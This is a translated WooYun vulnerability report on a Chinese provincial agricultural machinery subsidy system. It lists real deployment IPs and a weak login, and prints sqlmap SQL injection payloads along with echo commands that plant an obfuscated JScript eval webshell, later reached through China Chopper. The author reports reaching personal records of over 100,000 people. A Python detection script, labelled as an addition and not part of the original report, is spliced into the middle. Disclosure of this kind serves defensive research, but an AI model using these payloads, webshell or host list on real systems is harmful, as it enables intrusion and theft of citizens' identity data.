
Vulnerability summary

Defect ID: wooyun-2014-070849

Title: SQL injection on a neighbouring site of a provincial agricultural machinery purchase subsidy system (leaks the source code of this widely deployed system; information disclosure risk)

Vendor: CNCERT

Author: 超威蓝猫

Submitted: 2014-08-03 17:58

Fix deadline: 2014-11-01 18:00

Public disclosure: 2014-11-01 18:00

Vulnerability type: source code leak

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-08-03: Details sent to the vendor; awaiting vendor action
2014-08-08: Vendor confirmed the issue; details visible to the vendor only
2014-08-11: Details opened to third-party security partners
2014-10-02: Details opened to core white hats and domain experts
2014-10-12: Details opened to regular white hats
2014-10-22: Details opened to intern white hats
2014-11-01: Details made public

Brief description:

SQL injection on a neighbouring site of a provincial agricultural machinery purchase subsidy system (leaks the source code of this widely deployed system; information disclosure risk)

Detailed description:

By the look of it, this "Agricultural Machinery Purchase Subsidy Management Software System" is in use across the whole country; a few instances are listed below:

http://111.75.206.248:8081/ Jiangxi Province
http://116.52.13.46:2014/ Yunnan Province
http://113.140.74.6/ Shaanxi Province
http://61.178.38.194:2014/ Gansu Province
http://220.171.42.161:801/ Xinjiang
http://60.190.2.79/ Ningbo, Zhejiang
http://113.108.163.164:8080/ Guangdong Province
http://59.61.92.123:2014/ Xiamen, Fujian
http://218.58.77.226:82/ Qingdao, Shandong
http://124.93.228.165:92/ Dalian, Liaoning
http://58.49.103.227:2014/ Hubei Province
http://61.138.188.217:81/ Jilin Province
http://218.12.43.28/ Hebei Province


The Jiangxi server "111.75.206.248" also hosts this site: http://amic.jxagri.gov.cn/
http://amic.jxagri.gov.cn/jxmulu2014/ accepts the weak credential pair 123456:123456
After logging in, click "Archived Product Information" -> "View archiving status and feedback" in the left menu; the search box there is SQL-injectable

[Screenshot: sshot-2014-08-03-[1].png]

[Screenshot: sshot-2014-08-03-[2].png]

[Screenshot: sshot-2014-08-03-[3].png]


POST /jxmulu2014/Company_Product_List.aspx HTTP/1.1
Host: amic.jxagri.gov.cn
Proxy-Connection: keep-alive
Content-Length: 913
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://amic.jxagri.gov.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://amic.jxagri.gov.cn/jxmulu2014/Company_Product_List.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: _gscu_637803496=054844769hrepz30; ASP.NET_SessionId=xfcxhq45qrhokwumo2pjfkfd

__VIEWSTATE=%2BsxHERRYsN2t51DLo7FlVQOQI%2B35UDaSLsDH93uJnC%2BmSnuXm1Y3jz71931foXgZbuzN7S8XpeIu%2BGaNPuboxDtXaDaf7GRhpQarcBmtTeUjjZr%2BpL%2BesB33VNguIJfRqW1kZHuQArM9erjmMl9ikaXfv6fPzSS64OlL4FnH65gcZeuBgirePWg2EhB%2BlZ2iiaacyiawwnSyeQHKIJSgTkG65G9Zk7faTRVuCLPOoJq89xNHSxrHbFbdV5O4oC4U2A9J1yn9Pf9pBtQZLFZ9ej3gCvjEhl5yVZ2RbRx7szC3sWp%2BqDBZwYBH7LmX3%2FUtS1cF%2BxaiNmbqosjmql2zR3593F3IkLu0U3q7f2SC91BDTuJ92bVUdG0%2BmUoEczRe9omvIi0lkDM3jTifvLNq2VNCDqMnfLiGrwdgtb1BRFS%2B4TljbDvdc9blnDAmLr7r2OS8aDZt8IEo%2BaFzL4rE5bJkt4GuG%2F0xm%2B6%2F34caxa8R0tLRJbpvWqlbAyRu65m5vKUJ9EphjICCLGkNRiDJ2866jLSMyPFVcpJ8RfwBZw8gb1CPuUOKywuo953hipVMOlmkIflybaUE7u1EOm6J7uvN5%2FI%3D&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=K1xrMTDOkDPElC6msyO31mUJxf4FJqMUSrZGFalsGrYuOKsqGhfq0Ob6yGLlagbp%2BJXiy1vlK0dWPdZrlSJatxBaZEx%2Fjc9Hi9RYHoI4Aajocoh%2BKfHcfImjUjcjZau1HwQk4g%3D%3D&Searchtype=Model&seachvalue=1*&Searchuser=%E6%90%9C%E7%B4%A2&T_Message=


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=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&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=K1xrMTDOkDPElC6msyO31mUJxf4FJqMUSrZGFalsGrYuOKsqGhfq0Ob6yGLlagbp+JXiy1vlK0dWPdZrlSJatxBaZEx/jc9Hi9RYHoI4Aajocoh+KfHcfImjUjcjZau1HwQk4g==&Searchtype=Model&seachvalue=1%' AND 5829=CONVERT(INT,(SELECT CHAR(113)+CHAR(104)+CHAR(103)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5829=5829) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(106)+CHAR(99)+CHAR(113))) AND '%'='&Searchuser=%E6%90%9C%E7%B4%A2&T_Message=
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=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&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=K1xrMTDOkDPElC6msyO31mUJxf4FJqMUSrZGFalsGrYuOKsqGhfq0Ob6yGLlagbp+JXiy1vlK0dWPdZrlSJatxBaZEx/jc9Hi9RYHoI4Aajocoh+KfHcfImjUjcjZau1HwQk4g==&Searchtype=Model&seachvalue=1%'; WAITFOR DELAY '0:0:5'--&Searchuser=%E6%90%9C%E7%B4%A2&T_Message=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=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&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=K1xrMTDOkDPElC6msyO31mUJxf4FJqMUSrZGFalsGrYuOKsqGhfq0Ob6yGLlagbp+JXiy1vlK0dWPdZrlSJatxBaZEx/jc9Hi9RYHoI4Aajocoh+KfHcfImjUjcjZau1HwQk4g==&Searchtype=Model&seachvalue=1%' WAITFOR DELAY '0:0:5'--&Searchuser=%E6%90%9C%E7%B4%A2&T_Message=
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
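The three techniques sqlmap lists above (error-based via CONVERT(INT, ...), stacked queries, and WAITFOR DELAY time-based blind) leave recognisable traces in any log that records POST bodies. The following Python is an added detection example, not part of the original report or of the affected system: it decodes form bodies and flags every parameter whose decoded value matches one of those T-SQL patterns. The sample bodies are constructed here from the payload shapes in the sqlmap output; the signature set, the skipped ASP.NET fields, and the function names are my own choices.

```python
import re
from urllib.parse import parse_qs, urlencode

# Signatures for the MSSQL techniques sqlmap reported against `seachvalue`,
# applied to each URL-decoded form value. Labels follow sqlmap's wording.
SIGNATURES = {
    "time-based blind": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked queries": re.compile(
        r";\s*(WAITFOR|EXEC|EXECUTE|DECLARE|INSERT|UPDATE|DELETE|DROP|SHUTDOWN)\b",
        re.I,
    ),
    "error-based": re.compile(
        r"\bCONVERT\s*\(\s*INT\s*,|\bCHAR\s*\(\s*\d+\s*\)\s*\+", re.I
    ),
    "quote breakout": re.compile(r"'\s*(AND|OR)\s+\d+\s*=|'\s*--", re.I),
}

# ASP.NET framework fields carry opaque base64 blobs; skipping them avoids
# wasted matching on very long values. (Assumption: these fields are never
# the injection point for this page, which the sqlmap output supports.)
SKIP_FIELDS = {"__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTVALIDATION"}


def classify_body(body: str) -> dict:
    """Return {param: [technique, ...]} for every form field whose decoded
    value matches at least one signature; an empty dict means nothing fired."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name in SKIP_FIELDS:
            continue
        for value in values:
            for label, rx in SIGNATURES.items():
                if rx.search(value):
                    findings.setdefault(name, [])
                    if label not in findings[name]:
                        findings[name].append(label)
    return findings


def scan(bodies) -> list:
    """Return (index, findings) for every body that triggers a signature."""
    flagged = []
    for i, body in enumerate(bodies):
        findings = classify_body(body)
        if findings:
            flagged.append((i, findings))
    return flagged


def _body(search: str) -> str:
    # Constructed form body in the shape of the request on this page.
    return urlencode(
        {"Searchtype": "Model", "seachvalue": search, "Searchuser": "搜索", "T_Message": ""}
    )


# Constructed samples: one benign search, then the three payload shapes
# sqlmap reported (error-based, stacked, time-based), as they would be logged.
SAMPLE_BODIES = [
    _body("1"),
    _body("1%' AND 5829=CONVERT(INT,(SELECT CHAR(113)+CHAR(104))) AND '%'="),
    _body("1%'; WAITFOR DELAY '0:0:5'--"),
    _body("1%' WAITFOR DELAY '0:0:5'--"),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_BODIES):
        print(f"body #{index}: {findings}")
```

The regexes are deliberately narrow (T-SQL keywords and the quote-then-boolean shape) so they can run on a high-volume log without flooding analysts; widen them only after checking the false-positive rate on benign traffic from the same application.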


[Screenshot: sshot-2014-08-03-[4].png]


After some searching, I found that http://111.75.206.248:8081/ corresponds to the directory "D:\GouZBT2014\nybgjbt2014\",
and http://amic.jxagri.gov.cn/jxagri_web/ corresponds to "D:\njj2011\jxagri_web\".
Every way I tried of writing a one-line webshell produced a file that could not be reached; in the end I found it could be written with echo from --os-shell:

echo ^<%@ Page Language = Jscript %^> >> "D:\njj2011\jxagri_web\1.txt"
echo ^<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/ >> "D:\njj2011\jxagri_web\1.txt"
echo "a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+ >> "D:\njj2011\jxagri_web\1.txt"
echo "[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+ >> "D:\njj2011\jxagri_web\1.txt"
echo ","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval >> "D:\njj2011\jxagri_web\1.txt"
echo (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%^> >> "D:\njj2011\jxagri_web\1.txt"
rename "D:\njj2011\jxagri_web\1.txt" "index.bak.aspx"


[Screenshot: sshot-2014-08-03-[5].png]


Caidao (China Chopper) connected successfully:

[Screenshot: sshot-2014-08-03-[6].png]


Proof of vulnerability:

Connecting to the database:

[Screenshot: sshot-2014-08-03-[7].png]


[Screenshot: sshot-2014-08-03-[8].png]


Names, home addresses and national ID numbers of more than a hundred thousand people

[Screenshot: sshot-2014-08-03-[9].png]


At the same time, the source code of this nationally deployed system can be downloaded through Caidao; a code audit could well turn up generic vulnerabilities, which would then affect every site across the country running this system ._.||

Fix recommendation:

You're the professionals :)

Copyright notice: when reposting, please credit the source: 超威蓝猫@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2014-08-08 15:32

Vendor reply:

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-08-03 19:52 | Ares ( Passer-by | Rank:29 Vulnerabilities:8 | from the kindergarten senior class)

    @超威蓝猫 Blue Cat strikes again, awesome (V5)